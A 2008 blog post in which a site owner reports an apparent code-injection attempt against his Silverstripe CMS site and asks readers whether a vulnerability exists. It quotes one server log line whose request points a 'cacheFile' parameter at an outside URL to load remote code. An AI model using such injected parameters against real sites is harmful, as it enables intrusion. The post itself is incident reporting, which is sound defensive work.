Blog » A Hacking Attempt Targeting the Silverstripe CMS

A Hacking Attempt Targeting the Silverstripe CMS

Posted by Hans de Ruiter

This morning the first Silverstripe specific hacking attempt occurred. Three separate IP addresses from across the globe attempted to perform code-injection exploits on this website for about an hour. It is clearly targeting Silverstripe because the server logs show references to Silverstripe specific files, e.g.:

72.29.70.163 - - [28/Aug/2008:09:53:09 -0400] "GET /sapphire/core/SSViewer.php?cacheFile=http://misindo.com/~jemari/backup.txt?? HTTP/1.1" 200 5 "-" "libwww-perl/5.810"

At this stage it appears that the attack was unsuccessful. However, it is the first time that an attack targets the CMS that this site is using. This does raise the question as to whether someone has found a security vulnerability in Silverstripe. This attack could have referenced Silverstripe for two possible reasons:

  • A script has scanned through the Silverstripe files and is programmed to search for exploits in random files, or
  • Someone has found an exploit that works under certain situations (e.g., with a poorly configured server) and is scanning the internet for vulnerable Silverstripe websites.
I cannot determine which of these two is most likely from the server logs. If a reader that is more knowledgeable on Silverstripe internals and/or such exploits, please leave a comment or contact me. For those who are interested or just curious, the full log of the attack can be found on this page.



Comments (0) | 28 August 2008

Blog » A Hacking Attempt Targeting the Silverstripe CMS

Post your comment

Comments

No one has commented on this page yet.

RSS feed for comments on this page | RSS feed for all comments


Blog » A Hacking Attempt Targeting the Silverstripe CMS